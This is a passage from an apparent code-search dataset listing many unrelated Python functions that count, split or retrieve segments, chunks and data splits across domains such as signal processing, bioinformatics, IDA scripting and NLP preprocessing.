find item via binary search and count the occuranace of the item.\r\n for i in range(len(points)):\r\n if self.binary_search_for_count_segments(sorted_lst_2, points[i]) == points[i]:\r\n count[i] += sorted_lst_2.count(points[i])\r\n \r\n return count", "def _get_out_segments(self):\n return self.__out_segments", "def Segments():\n for n in range(ida_segment.get_segm_qty()):\n seg = ida_segment.getnseg(n)\n if seg:\n yield seg.start_ea", "def iter_segments(self):\n return\n yield", "def count_segments(s):\n s = s.strip().split()\n return len(s)", "def count(self) -> Tuple[groupable, pdarray]:\n repMsg = generic_msg(\n cmd=\"countReduction\",\n args={\"segments\": cast(pdarray, self.segments), \"size\": self.length},\n )\n self.logger.debug(repMsg)\n return self.unique_keys, create_pdarray(repMsg)", "def _count_chunks(matches):\n i = 0\n chunks = 1\n while (i < len(matches) - 1):\n if (matches[i + 1][0] == matches[i][0] + 1) and (matches[i + 1][1] == matches[i][1] + 1):\n i += 1\n continue\n i += 1\n chunks += 1\n return chunks", "def count_segments(self, raw_only: bool = False) -> int:\n if self.segments:\n self_count = 0 if raw_only else 1\n return self_count + sum(\n seg.count_segments(raw_only=raw_only) for seg in self.segments\n )\n else:\n return 1", "def segments(self):\n return (self._subset((i,i+1)) for i in range(len(self)-1))", "def __len__(self):\n return len(self.segments)", "def getChunks():", "def split_count(self) -> int:\n return int(self.graph_tuple_stats.split_count or 0)", "def get_all_segments(edfFiles):\n\n segments = []\n preprocessor = Preprocessor(config_startShift,\n config_endShift,\n config_powerLineFreq,\n config_bandLowCut,\n config_bandHighCut)\n for edf in edfFiles:\n print(\"getting the labeled segments from the recording \", str(edf.filename))\n 
segments.extend(get_segments_from_edf(edf, preprocessor))\n if edfFiles.index(edf) == 20: break\n return segments", "def getSegments(points):\n return _identifyStrokes(points)[1]", "def get_segment_index(datadb):\n #match in time!!!!\n if cfg.use_saliency:\n segment_index_tar = util.get_time_for_visual(datadb)\n segment_index_tar_future = OrderedDict()\n for key in segment_index_tar.keys():\n segment_index_tar_future[key] = np.array(segment_index_tar[key])+max_encoder_seq_length\n return segment_index_tar,segment_index_tar_future", "def get_n_splits(\n self,\n X: DataFrame,\n sections: Union[str, List[str]],\n y: Optional[Union[Series, ndarray]] = None,\n groups: Optional[Union[Series, ndarray]] = None,\n ) -> int:\n return X.groupby(sections).count().index.shape[0] * self.n_splits", "async def get_segment_count(lang: str):\n try:\n collection = get_collection(lang)\n return {\"count\": collection.count()}\n except KeyError as error:\n return error", "def _get_ngrams(segments, order):\n ngram_counts = collections.Counter()\n for seg in segments:\n for i in range(0, len(seg) - order + 1):\n ngram = tuple(seg[i:i+order])\n ngram_counts[ngram] += 1\n return ngram_counts", "def testViewOccData(self):\n try:\n entryD = self.__mU.doImport(self.__instanceSavePath, fmt=\"pickle\")\n segmentCountList = []\n segmentLengthList = []\n entryCountD = {}\n for entryId in entryD:\n for _, eD in entryD[entryId][\"selected_polymer_entities\"].items():\n\n analD = eD[\"anal_instances\"] if \"anal_instances\" in eD else {}\n\n for _, aD in analD.items():\n entryCountD[entryId] = True\n segmentCount = len(aD[\"owabRegiond\"])\n segmentLengths = [d[\"length\"] for sId, d in aD[\"owabRegiond\"].items()]\n\n segmentCountList.append(segmentCount)\n segmentLengthList.extend(segmentLengths)\n #\n logger.info(\"gaps %d gap lengths %d\", len(segmentCountList), len(segmentLengthList))\n #\n cu = DisorderChartUtils()\n cu.doIntegerBarChart(\n segmentCountList,\n plotPath=self.__plotOwabSegmentCount,\n yPlotScale=\"log\",\n yPlotMax=6,\n xPlotMax=100,\n xPlotLabel=\"Segment Count\",\n yPlotLabel=\"Protein Instances (log)\",\n plotTitle=\"Segment counts (OWAB > 2 * mean OWAB)\",\n )\n self.__writeLegend(\n self.__plotOwabSegmentCount,\n \"Segment counts for all (%d) protein sequences (OWAB > 2 * mean OWAB and X-ray resolution limit < 3.5 Angstoms (entries=%d)) \"\n % (len(segmentCountList), len(entryCountD)),\n )\n cu.doIntegerBarChart(\n segmentLengthList,\n plotPath=self.__plotOwabSegmentLength,\n yPlotScale=\"log\",\n yPlotMax=6,\n xPlotMax=100,\n xPlotLabel=\"Segment width (residues)\",\n yPlotLabel=\"Segment Instances (log)\",\n plotTitle=\"Segment widths (OWAB > 2 * mean OWAB)\",\n )\n self.__writeLegend(\n self.__plotOwabSegmentLength,\n \"Segment widths for all (%d) protein sequences (OWAB > 2 * mean OWAB and X-ray resolution limit < 3.5 Angstoms (entries=%d)) \"\n % (len(segmentLengthList), len(entryCountD)),\n )\n except Exception as e:\n logger.exception(\"Failing with %s\", str(e))\n self.fail()", "def energy_calc(signal: np.array, segment_length: int) -> np.array:\n energy = []\n for i in range(int(len(signal)/segment_length)):\n segment = signal[i*segment_length:(i+1)*segment_length]# try except error ...\n energy.append(np.sum(np.square(segment)) / segment_length)\n if energy[-1] < 0:\n print(i)\n return energy", "def _convert_to_counts(self, indiv_data):\n count_data = {}\n for indiv in indiv_data:\n for allele in indiv:\n if allele is not None:\n allele_count = count_data.get(str(allele), 0)\n 
count_data[str(allele)] = allele_count + 1\n return count_data", "def countDataSize(self,filename):\n \n try:\n d = h5py.File(filename,'r')\n except:\n print(filename)\n return \n\n N = 0\n scan_edges = d['level2/Statistics/scan_edges'][:]\n for (start,end) in scan_edges:\n N += (end-start)//self.offsetLen * self.offsetLen\n d.close()\n\n N = N*self.Nfeeds\n\n self.chunks += [[int(self.Nsamples), int(self.Nsamples+N)]]\n self.datasizes += [int(N/self.Nfeeds)]\n self.Nsamples += int(N)", "def segmentation_split(Y, X, Ls, n_sampels): \n n_seg = int(n_sampels/Ls) # Number of segments\n X = X.T[:n_seg*Ls] # remove last segement if too small\n Y = Y.T[:n_seg*Ls]\n \n Ys = np.split(Y.T, n_seg, axis=1) # Matrices with segments in axis=0\n Xs = np.split(X.T, n_seg, axis=1) # Matrices with segments in axis=0\n \n return Ys, Xs, n_seg", "def extract_segments(results):\n tt = [ ( parse_date(x[\"t1\"]), parse_date(x[\"t2\"]) ) for x in results[\"labels\"]+results[\"detected\"] ]\n ts = sorted(itertools.chain.from_iterable( tt ))\n t1 = parse_date(results[\"t1\"])\n if t1 < ts[0]:\n ts.insert(0, t1)\n t2 = parse_date(results[\"t2\"])\n if t2 > ts[-1]:\n ts.append(t2)\n return [ dict(t1=x[0].isoformat(), t2=x[1].isoformat()) for x in list(sliding_window(ts, 2)) ]", "def get_n_splits(self):\n pass", "def sections(self) -> int:\n return len(self.string.split(\".\"))", "def countsubcatchments(inputfilename=FileSettings.settingsdict['inputfilename']):\r\n global count\r\n with open(inputfilename, 'r') as swmmput:\r\n contents = swmmput.readlines()\r\n count = len(contents)\r\n return(count)", "def _chunklines(self):\r\n text = self.textwnd.toPlainText()\r\n lines_in_chunk = len(text.split(\"\\n\"))\r\n logger.debug(\"Lines in chunk: {}\".format(lines_in_chunk))\r\n return lines_in_chunk", "def SentenceSplitsStops(f):\n\tcounter=0\n\twith open(filename) as f:\n\t\tread = csv.reader(f)\n\t\tfor row in read:\n\t\t\t#Original\n\t\t\tzin0=row[0]\n\t\t\t#Human Translation\n\t\t\tzin1=row[1]\n\t\t\t#Machine Translation\n\t\t\tzin2=row[2]\n\t\t\tcounter+=1\n\t\t\t#FULL STOPS\n\t\t\t#print(abs((zin0.count('.') - zin1.count('.'))))\n\t\t\tprint(abs((zin0.count('.') - zin2.count('.'))))", "def get_number_of_measurement(self):\n used_fragments = set()\n counter = 0\n for fragment in self.observed_fragments:\n num_of_isotope = 0\n used_counter = 0\n for i in self.mdv[fragment]:\n num_of_isotope = num_of_isotope + 1\n if self.mdv[fragment][i]['use'] == 'use':\n\n counter = counter + 1\n used_counter = used_counter + 1\n if num_of_isotope == used_counter:\n used_fragments.add(fragment)\n return counter-len(used_fragments)", "def getSplitSize(self, split, ofwhat='sentences'):\n if ofwhat == 'sentences':\n return sum(len(img['sentences']) for img in self.split[split])\n else: # assume images\n return len(self.split[split])", "def _calculate_chunk_offsets(self):\n offset = 0\n offsets = []\n for chunk in self.data.iterchunks():\n offsets.append(offset)\n offset += len(chunk)\n return np.array(offsets)", "def countDataSize(self,filename):\n \n d = h5py.File(filename,'r')\n features = d['spectrometer/features'][:]\n select = self.selectData(features.astype(float), self.ifeature, d)\n N = len(features[select])\n d.close()\n\n N = (N//self.offsetLen) * self.offsetLen\n\n N = N*self.Nfeeds\n\n self.chunks += [[int(self.Nsamples), int(self.Nsamples+N)]]\n self.datasizes += [int(N/self.Nfeeds)]\n self.Nsamples += int(N)", "def count():", "def get_segments(self):\n\t\tos.chdir(self.segment_path)\n\t\tfor path in 
glob.glob(\"%s/*.seg\" % self.segment_path):\n\t\t\t_file = os.path.split(path)[1]\n\t\t\tdae = DiscreetArchiveElement(self,_file,element_type='segment')\n\t\t\tself.elements.append(dae)\n\t\treturn True", "def test_getting_segment_details(self):\n pass", "def get_segments(input_path):\n with open(input_path, 'r') as segments_file:\n segments = []\n for line in segments_file:\n words = line.split('\\t')\n sg_dict = {}\n sg_dict['start'] = float(words[0].replace(',', '.'))\n sg_dict['end'] = float(words[1].replace(',', '.'))\n sg_dict['class'] = words[2][:-1]\n segments.append(sg_dict)\n return segments", "def handle_splits(self, splits):\n total_leftover_cash = 0\n\n for instrument, ratio in splits:\n if instrument in self.positions:\n self._dirty_stats = True\n\n # Make the position object handle the split. It returns the\n # leftover cash from a fractional share, if there is any.\n position = self.positions[instrument]\n leftover_cash = position.handle_split(instrument, ratio)\n total_leftover_cash += leftover_cash\n\n return total_leftover_cash", "def _n_outer(econf):\n n_tot, ns, np, nd, nf = 0, 0, 0, 0, 0\n for shell in econf.split(' ')[1:]:\n n_shell = 0\n if shell[-1].isalpha():\n n_shell = 1\n elif len(shell) == 3:\n n_shell = int(shell[-1])\n elif len(shell) == 4:\n n_shell = int(shell[-2:])\n n_tot += n_shell\n if 's' in shell:\n ns += n_shell\n elif 'p' in shell:\n np += n_shell\n elif 'd' in shell:\n nd += n_shell\n elif 'f' in shell:\n nf += n_shell\n return n_tot, ns, np, nd, nf", "def get_segments(cst):\n assert isinstance(cst, ChromStruct)\n\n # create a set of coordinates for the start and end of segments\n segs = np.load(cst.sg_files)['sg']\n end = np.cumsum(segs)\n start = np.concatenate(([0], end[:-1]))\n\n return np.column_stack((start, end)).astype(int)", "def parse_segments(self):\n segs = self.unixtext.split(\"$$\")\n for seg in segs:\n self.segments.append(TextProductSegment(seg, self))", "def split(self, X):", "def getSegments(self):\n l = len(self.points)\n return [Segment(self.points[i % l], self.points[(i + 1) % l], \\\n color=self.side_color, width=self.side_width) for i in range(l)]", "def _setup_splits(self):\n #ntot = self.reredux_conf['nperfile']\n ntot = self.reredux_conf['Ngals']\n npersplit = self.runconf['nper']\n\n self.beglist, self.endlist = get_splits(ntot, npersplit)", "def _get_observation_count(self):\n observation_count = 0\n for sequence in self.seq_list:\n observation_count += sequence.shape[0] \n \n return observation_count", "def street_segment_count(Gu):\n if nx.is_directed(Gu): # pragma: no cover\n msg = \"`Gu` must be undirected\"\n raise ValueError(msg)\n return len(Gu.edges)", "def oversegmentation_statistics(seg, n_bins):\n\n def extract_segs_in_slice(z):\n # 2d blocking representing the patches\n seg_z = seg[:,:,z]\n return np.unique(seg_z).shape[0]\n\n # parallel\n with futures.ThreadPoolExecutor(max_workers=8) as executor:\n tasks = []\n for z in xrange(seg.shape[2]):\n tasks.append(executor.submit(extract_segs_in_slice, z))\n segs_per_slice = [fut.result() for fut in tasks]\n\n # calculate histogram to have a closer look at the stats\n histo, bin_edges = np.histogram(segs_per_slice, bins = n_bins)\n # we only need the bin_edges\n return bin_edges", "def segmenter(data_stream: numpy.ndarray) -> Sequence[int]:\n diff = numpy.median(\n numpy.convolve(\n numpy.abs(numpy.diff(data_stream)), numpy.array([1, 1, 1, 1, 1]) / 5\n )\n )\n return cast(\n Sequence[int],\n numpy.where(\n numpy.abs(numpy.diff(data_stream, 
prepend=data_stream[0])) > diff * 5\n )[0],\n )", "def get_segments(self, start=False):\n cmd = [\"ipcs\", \"-a\"]\n process = subprocess.Popen(cmd, stdout=subprocess.PIPE)\n output, err = process.communicate()\n output = output.decode(\"utf-8\").split(\"\\n\")\n\n keys = ['key', 'shmid', 'owner', 'perms', 'bytes', 'nattch',\n 'status']\n segments = {}\n\n for line in output:\n # this should capture all keys\n # note: it won't do queues vs mem vs sem etc.\n if line[0:2] == '0x':\n values = list(filter(None, line.split(\" \")))\n data = dict(zip(keys, values))\n if start:\n # print (data['shmid'])\n self.segments[data['shmid']] = data\n segments[data['shmid']] = data\n return segments", "def summarizePosition(self, index):\n countAtPosition = Counter()\n excludedCount = 0\n\n for read in self:\n try:\n countAtPosition[read.sequence[index]] += 1\n except IndexError:\n excludedCount += 1\n\n return {\n 'excludedCount': excludedCount,\n 'countAtPosition': countAtPosition\n }", "def _get_end_points(self, segmented_instances, i, stats, idx):\n\n end_points=[]\n\n # find all points intersecting the bbox\n #(tl_x, th_y, width, height, area)\n label_num=i+1\n leftmost_x = stats['bbox'][i][cv2.CC_STAT_LEFT]\n topmost_y = stats['bbox'][i][cv2.CC_STAT_TOP]\n width = stats['bbox'][i][cv2.CC_STAT_WIDTH]\n height = stats['bbox'][i][cv2.CC_STAT_HEIGHT]\n bottom_most_y = topmost_y + height-1\n right_most_x = leftmost_x + width-1\n\n segmented_instances_copy=segmented_instances.copy()\n edge_points = np.zeros(segmented_instances.shape).astype(np.uint8)\n segs = np.zeros(segmented_instances.shape).astype(np.uint8)\n segs[segmented_instances==label_num]=255\n cv2.rectangle(segmented_instances_copy,(leftmost_x, topmost_y), (right_most_x, bottom_most_y), 150, 2)\n\n #Get all points for the current stem segment\n label_points = np.argwhere(segmented_instances.copy()==label_num)\n\n # upper points from (tl_x,th_y) to (th_x, th_y) that instersect with the upper edge of the bouding box\n upper_points = [i for i in label_points if i[0]==topmost_y and i[1]>=leftmost_x and i[1]<=right_most_x]\n x_pts, segs, edge_points = self._update_imgs_and_pt_list(upper_points, edge_points, segs, 1)\n center_upper_pts = sorted(self._get_centeroids(x_pts))\n\n # left side points from (tl_x, tl_y) to (tl_x, th_y) that instersect with the left edge of the bouding box\n left_points = [i for i in label_points if i[1]==leftmost_x and i[0]<=bottom_most_y and i[0]>=topmost_y]\n x_pts, segs, edge_points = self._update_imgs_and_pt_list(left_points, edge_points, segs, 0)\n center_left_pts = sorted(self._get_centeroids(x_pts))\n\n #right side points form (th_x, tl_y) to (th_x, th_y) that instersect with the right edge of the bouding box\n right_points = [i for i in label_points if i[1]==right_most_x and i[0]<=bottom_most_y and i[0]>=topmost_y]\n x_pts, segs, edge_points = self._update_imgs_and_pt_list(right_points, edge_points, segs, 0)\n center_right_pts = sorted(self._get_centeroids(x_pts))\n\n #bottom points from (tl_x, tl_y) to (th_x,tl_y)\n bottom_points = [i for i in label_points if i[1]>=leftmost_x and i[1]<=right_most_x and i[0]==bottom_most_y]\n x_pts, segs, edge_points = self._update_imgs_and_pt_list(bottom_points, edge_points, segs, 1)\n center_bottom_pts = sorted(self._get_centeroids(x_pts))\n\n # If there are corner edges, get the centroid of that\n center_x_lb, center_y_lb, center_left_pts, center_bottom_pts = self._get_corner_centers(center_left_pts, \\\n center_bottom_pts, bottom_most_y, leftmost_x)\n if (center_x_lb != None) 
and (center_y_lb != None):\n end_points.append([center_x_lb, center_y_lb])\n else:\n if len(center_left_pts)>0:\n for pt_idx in range(0, len(center_left_pts)):\n end_points.append([leftmost_x, center_left_pts[pt_idx]])\n if len(center_bottom_pts)>0:\n for pt_idx in range(0, len(center_bottom_pts)):\n end_points.append([center_bottom_pts[pt_idx], bottom_most_y])\n\n # If there are corner edges, get the centroid of that\n center_x_ur, center_y_ur, center_right_pts, center_upper_pts = self._get_corner_centers(center_right_pts, \\\n center_upper_pts, topmost_y, right_most_x)\n if (center_x_ur != None) and (center_y_ur != None):\n end_points.append([center_x_ur, center_y_ur])\n else:\n if len(center_right_pts)>0:\n for pt_idx in range(0, len(center_right_pts)):\n end_points.append([right_most_x, center_right_pts[pt_idx]])\n if len(center_upper_pts)>0:\n for pt_idx in range(0, len(center_upper_pts)):\n end_points.append([center_upper_pts[pt_idx], topmost_y])\n\n # If there are corner edges, get the centroid of that\n center_x_ul, center_y_ul, center_left_pts, center_upper_pts = self._get_corner_centers(center_left_pts, \\\n center_upper_pts, topmost_y, leftmost_x)\n if (center_x_ul != None) and (center_y_ul != None):\n end_points.append([center_x_ul, center_y_ul])\n else:\n if len(center_left_pts)>0:\n for pt_idx in range(0, len(center_left_pts)):\n end_points.append([leftmost_x, center_left_pts[pt_idx]])\n if len(center_upper_pts)>0:\n for pt_idx in range(0, len(center_upper_pts)):\n end_points.append([center_upper_pts[pt_idx], topmost_y])\n\n\n # If there are corner edges, get the centroid of that\n center_x_br, center_y_br, center_right_pts, center_bottom_pts = self._get_corner_centers(center_right_pts, \\\n center_bottom_pts, bottom_most_y, right_most_x)\n if (center_x_br != None) and (center_y_br != None):\n end_points.append([center_x_br, center_y_br])\n else:\n if len(center_right_pts)>0:\n for pt_idx in range(0, len(center_right_pts)):\n end_points.append([right_most_x, center_right_pts[pt_idx]])\n if len(center_bottom_pts)>0:\n for pt_idx in range(0, len(center_bottom_pts)):\n end_points.append([center_bottom_pts[pt_idx], bottom_most_y])\n\n #self.showme(segmented_instances_copy, 'bbox')\n\n return end_points", "def segment_lengths(self):\n if not hasattr(self, '_segment_lengths'):\n _ = self.length # Sets length and segment_lengths\n return self._segment_lengths", "def getTimeSegments(segments,bounds,radius,starttime,endtime,magrange,catalog,contributor):\n stime = starttime\n etime = endtime\n \n dt = etime - stime\n dtseconds = dt.days*86400 + dt.seconds\n #segment 1\n newstime = stime\n newetime = stime + timedelta(seconds=dtseconds/2)\n nevents,maxevents = getEventCount(bounds=bounds,radius=radius,starttime=newstime,endtime=newetime,\n magrange=magrange,catalog=catalog,contributor=contributor)\n if nevents < maxevents:\n segments.append((newstime,newetime))\n else:\n segments = getTimeSegments(segments,bounds,radius,newstime,newetime,\n magrange,catalog,contributor)\n #segment 2\n newstime = newetime\n newetime = etime\n nevents,maxevents = getEventCount(bounds=bounds,radius=radius,\n starttime=newstime,endtime=newetime,\n magrange=magrange,catalog=catalog,\n contributor=contributor)\n if nevents < maxevents:\n segments.append((newstime,newetime))\n else:\n segments = getTimeSegments(segments,bounds,radius,newstime,newetime,\n magrange,catalog,contributor)\n\n return segments", "def split_segment(self):\n # Selection management\n selected_segment = \\\n 
self.controller.shared_data.obj_track.selected_segment_idx\n\n if len(selected_segment) > 1:\n messagebox.showerror('Warning',\n 'More than one segment is selected')\n return\n elif len(selected_segment) == 0:\n messagebox.showerror('Warning',\n 'No segment is selected')\n return\n else:\n segment_idx = selected_segment[0]\n df_segment = \\\n self.controller.shared_data.obj_track.get_segment(segment_idx)\n\n # Create interactivity\n del self.split_segment_interaction\n self.split_segment_interaction = SplitSegmentCallback(\n self.controller.shared_data,\n df_segment)\n\n self.split_segment_interaction.connect()", "def _subdivideDomain(self, divisionInstructions, trainingSet):\n unclustered = []\n # division instructions are as {subspace: (mode, value)}\n ## where \"value\" is the number of segments in \"split\" mode\n ## or the length of pivot values per segment in \"value\" mode\n self.raiseADebug('Training segmented subspaces for \"{}\" ...'.format(self._romName))\n for subspace, (mode, value) in divisionInstructions.items():\n dataLen = len(trainingSet[subspace][0]) # TODO assumes syncronized histories, or single history\n self._divisionInfo['historyLength'] = dataLen # TODO assumes single pivotParameter\n if mode == 'split':\n numSegments = value # renamed for clarity\n # divide the subspace into equally-sized segments, store the indexes for each segment\n counter = np.array_split(np.arange(dataLen), numSegments)\n # only store bounds, not all indices in between -> note that this is INCLUSIVE!\n counter = list((c[0], c[-1]) for c in counter)\n # Note that \"segmented\" doesn't have \"unclustered\" since chunks are evenly sized\n elif mode == 'value':\n segmentValue = value # renamed for clarity\n # divide the subspace into segments with roughly the same pivot length (e.g. 
time length)\n pivot = trainingSet[subspace][0]\n # find where the data passes the requested length, and make dividers\n floor = 0 # where does this pivot segment start?\n nextOne = segmentValue # how high should this pivot segment go?\n counter = []\n # TODO speedup; can we do this without looping?\n while pivot[floor] < pivot[-1]:\n cross = np.searchsorted(pivot, nextOne)\n # if the next crossing point is past the end, put the remainder piece\n ## into the \"unclustered\" grouping, since it might be very oddly sized\n ## and throw off segmentation (specifically for clustering)\n if cross == len(pivot):\n unclustered.append((floor, cross - 1))\n break\n # add this segment, only really need to know the first and last index (inclusive)\n counter.append((floor, cross - 1)) # Note: indices are INCLUSIVE\n # update search parameters\n floor = cross\n nextOne += segmentValue\n self.raiseADebug('Dividing {:^20s} into {:^5d} divisions for training ...'.format(subspace, len(counter) + len(unclustered)))\n # return the counter indicies as well as any odd-piece-out parts\n return counter, unclustered", "def testSectionCount(self):\n\n self.sectionCount(3640)", "def getCounts(self):\n ret = [0]*len(self.numToLabel)\n for block in self.blocks:\n for label in block[1]: ret[label] += 1\n return ret", "def getsegs (bounds, split):\n segmentslist=bisect_rectange(split, bounds[0], bounds[1], bounds[2], bounds[3])\n count=1\n segpass=0\n \n #Get list of segment ids currently in database\n query=\"\"\"select seg_id from segment;\"\"\"\n df = pd.read_sql_query(query,con=engine)\n segids=set(df.seg_id)\n \n while count < len(segmentslist):\n try:\n for i in segmentslist:\n segments=getsegmentinfo(i)\n \n \n for seg in segments:\n #If running function several times for different splits, this ignores existing segments and prints a message\n if seg.id in segids: \n segpass+=1\n if (segpass % 10 == 0): \n print (\"{} segments already exist\".format(segpass))\n #Else this is a new segment, so get details from the strava and geocodio apis and save them to a dataframe and eventually to the database\n else:\n location = geocodio_client.reverse((seg.start_latlng[0], seg.start_latlng[1]))\n zipcode=location['results'][0]['address_components']['zip']\n \n newrow = {'seg_id' : seg.id,\n 'resource_state': seg.resource_state,\n 'climb_category':seg.climb_category,\n 'climb_category_desc':seg.climb_category_desc,\n 'average_grade':seg.avg_grade,\n 'elev_difference': str(seg.elev_difference).split()[0],\n 'distance': str(seg.distance).split()[0],\n 'name' : seg.name,\n 'start_lat' : seg.start_latlng[0],\n 'start_long' : seg.start_latlng[1],\n 'end_lat' : seg.end_latlng[0],\n 'end_long' : seg.end_latlng[1],\n 'points' : seg.points,\n 'starred':seg.starred,\n 'zipcode':zipcode\n }\n df=pd.DataFrame(newrow, index=[0])\n \n try:\n #Save dataframe to database\n df.to_sql('segment', engine,index=False,if_exists='append')\n except:\n pass\n\n #Prints message which keeps track of number of sub bounds completed \n if (count % 10) == 0:\n print (\"Getting segments in bound {} of {}\".format(count, len(segmentslist)))\n count+=1\n except Exception as inst:\n print (inst) \n return None", "def countsin(inLoc):\n countFile = open(inLoc, \"r\").readlines()\n counts=[]\n for i in range(1, len(countFile)):\n temp = countFile[i].rstrip().split(\",\")\n counts.append([temp[0][8:], temp[1], temp[2]])\n return counts", "def get_segments(label_file, window=5):\n labels = pd.read_csv(label_file).sort_values('start').reset_index(\n drop=True)\n 
wlabels = labels.copy()\n wlabels.start -= window\n wlabels.stop += window\n # union segments\n b = []\n for x in wlabels.itertuples():\n if len(b) == 0:\n b.append([x.start, x.stop])\n elif x.start > b[-1][1]:\n b.append([x.start, x.stop])\n elif x.stop > b[-1][1]:\n b[-1][1] = x.stop\n # update labels times to new chunks\n prevchunks = 0\n for j, (start, stop) in enumerate(b):\n mask = (labels.start >= start) & (labels.stop <= stop)\n offset = -start + prevchunks\n labels.loc[mask, [\"start\", \"stop\"]] += offset\n prevchunks += stop - start\n return np.array(b), labels", "def segment_download_count(self):\n # type: () -> int\n return self._segment_download_count", "def segments(seg_type=None):\n\n for index in xrange(idaapi.get_segm_qty()):\n seg = Segment(index=index)\n if (seg_type is None) or (seg.type == seg_type):\n yield Segment(index=index)", "def _get_spans(self, span_info_parts: List[str]) -> List[Tuple[int, int, int]]:\n result_spans = []\n\n for p in span_info_parts:\n if p == \"\":\n break\n c, start, end = p.split(\" \")\n if c not in self._semiotic_classes:\n raise KeyError(\"class=\" + c + \" not found in self._semiotic_classes\")\n cid = self._semiotic_classes[c]\n # +1 because this should be indexing on input_ids which has [CLS] token at beginning\n start = int(start) + 1\n end = int(end) + 1\n result_spans.append((cid, start, end))\n return result_spans", "def segment(self):\n start = self.alignment.matching_function_startpoint(self.idx)\n end = self.alignment.matching_function_endpoint(self.idx)\n return [start, end]", "def set_segments(self, segments):\n self.send_command(Command.SET_SEGMENT_COUNT, [segments])", "def indices_of_split(self, split_name='train'):\n return self.indices_of('split', split_name)", "def _findTangentSplitThreshold(self, angles, threshold):\n splits = []\n\n # split based on angles\n for i, angle in enumerate(angles):\n if angle > threshold:\n splits.append(i + 1)\n\n return splits", "def get_test_segments(data):\n n_channels = data.shape[0]\n n_steps = data.shape[1]\n factor = 2\n n_segments = n_steps // factor\n\n segments = []\n for i_segment in range(n_segments):\n for i_channel in range(n_channels):\n segment = {\n 'index': i_segment + i_channel * n_segments,\n 'start': i_segment,\n 'stop': i_segment + 1,\n 'weight': data[i_channel, factor * i_segment],\n }\n if n_channels > 1:\n segment['channel'] = i_channel\n segments.append(segment)\n\n return segments", "def divisions(self,domain,divisions):\n size = domain.height/divisions\n counter = []\n for i in range(divisions):\n count = ((self.z >= i*size) & (self.z < (i+1)*size)).sum()\n counter.append(count)\n return counter", "def example_to_token_ids_segment_ids_label_ids(\n ex_index,\n example,\n max_seq_length,\n max_evid_length,\n tokenizer):\n if ex_index < 5:\n print('*** Example {} ***'.format(ex_index))\n print('qid: {}'.format(example.qid))\n\n qid = example.qid\n\n # ante evidence\n ante_evidence = example.ante_evidence # list of strings.\n ante_token_ids, ante_segment_ids = [], []\n for ante_sent in ante_evidence:\n ante_sent_tokens = tokenizer.tokenize(ante_sent)\n ante_sent_tokens = ante_sent_tokens[:max_evid_length-2]\n sent_tokens, sent_segment_ids = [], []\n sent_tokens.append(\"<s>\")\n sent_segment_ids.append(0)\n sent_tokens += ante_sent_tokens + [\"</s>\"]\n sent_segment_ids += [0] * len(ante_sent_tokens) + [0]\n\n assert len(sent_tokens) <= max_evid_length\n sent_tokens_ids = tokenizer.convert_tokens_to_ids(sent_tokens)\n\n assert len(sent_tokens_ids) == 
len(sent_segment_ids)\n ante_token_ids.append(sent_tokens_ids)\n ante_segment_ids.append(sent_segment_ids)\n assert len(ante_evidence) == len(ante_token_ids)\n assert len(ante_evidence) == len(ante_segment_ids)\n l_ante = min(len(ante_evidence), max_evid_length)\n\n # cons evidence\n cons_evidence = example.cons_evidence # list of strings.\n cons_token_ids, cons_segment_ids = [], []\n for cons_sent in cons_evidence:\n cons_sent_tokens = tokenizer.tokenize(cons_sent)\n cons_sent_tokens = cons_sent_tokens[:max_evid_length-2]\n sent_tokens, sent_segment_ids = [], []\n sent_tokens.append(\"<s>\")\n sent_segment_ids.append(0)\n sent_tokens += cons_sent_tokens + [\"</s>\"]\n sent_segment_ids += [0] * len(cons_sent_tokens) + [0]\n\n assert len(sent_tokens) <= max_evid_length\n sent_tokens_ids = tokenizer.convert_tokens_to_ids(sent_tokens)\n\n assert len(sent_tokens_ids) == len(sent_segment_ids)\n cons_token_ids.append(sent_tokens_ids)\n cons_segment_ids.append(sent_segment_ids)\n assert len(cons_evidence) == len(cons_token_ids)\n assert len(cons_evidence) == len(cons_segment_ids)\n l_cons = min(len(cons_evidence), max_evid_length)\n\n para_tokens = tokenizer.tokenize(example.para)\n question_tokens = tokenizer.tokenize(example.question)\n answers_tokens = map(tokenizer.tokenize, example.answers)\n\n token_ids = []\n segment_ids = []\n for choice_idx, answer_tokens in enumerate(answers_tokens):\n\n truncated_para_tokens, \\\n truncated_question_tokens,\\\n truncated_answer_tokens = _truncate_seq_pair(para_tokens, question_tokens, answer_tokens, max_seq_length)\n\n choice_tokens = []\n choice_segment_ids = []\n choice_tokens.append(\"<s>\")\n choice_segment_ids.append(0)\n choice_tokens += truncated_para_tokens + [\"</s>\"]\n choice_segment_ids += [0] * len(truncated_para_tokens) + [0]\n choice_tokens += truncated_question_tokens + [\"</s>\"]\n choice_segment_ids += [1] * len(truncated_question_tokens) + [1]\n choice_tokens += truncated_answer_tokens\n choice_segment_ids += [1] * len(truncated_answer_tokens)\n\n choice_token_ids = tokenizer.convert_tokens_to_ids(choice_tokens)\n\n token_ids.append(choice_token_ids)\n segment_ids.append(choice_segment_ids)\n\n label_ids = [example.label]\n\n if ex_index < 5:\n print('label: {} (id = {:d})'.format(example.label, label_ids[0]))\n\n return ante_token_ids, ante_segment_ids, l_ante, \\\n cons_token_ids, cons_segment_ids, l_cons, \\\n token_ids, segment_ids, label_ids, qid", "def info(self):\n c = 0\n for s in self.segments:\n c+= len(s.points)\n return \"Nodes : %5i\\nSegments : %5i\\nPoints : %5i\" % (len(self.nodes), len(self.segments), c)", "def segments(self):\n L = len(self.vertices)\n return itertools.chain((self._subset((i,i+1)) for i in range(len(self)-1)),\n (self._subset((L-1,0)),))", "def numEvents(self):\n offsets = self.baxH5._offsetsByHole[self.holeNumber]\n return offsets[1] - offsets[0]", "def _num_edges(self):\n return len(self._eid2partid)", "def part2(fname: dict) -> int:\n return sum(len(set.intersection(*[set(pax) for pax in group])) for group in get_data(fname))", "def get_exons(chromStart, chromEnd, blockSizes, blockStarts):\n blockSizes = [int(i) for i in blockSizes.split(\",\") if not i == \"\" ]\n blockStarts = [int(i) for i in blockStarts.split(\",\") if not i == \"\" ]\n n = len(blockSizes)\n exons = []\n #print(\"block: \" + str(n))\n #print(blockSizes, blockStarts)\n for i in range(n):\n #print(i)\n blockStart = blockStarts[i]\n blockSize = blockSizes[i]\n exonStart = chromStart + blockStart\n exonEnd = exonStart + 
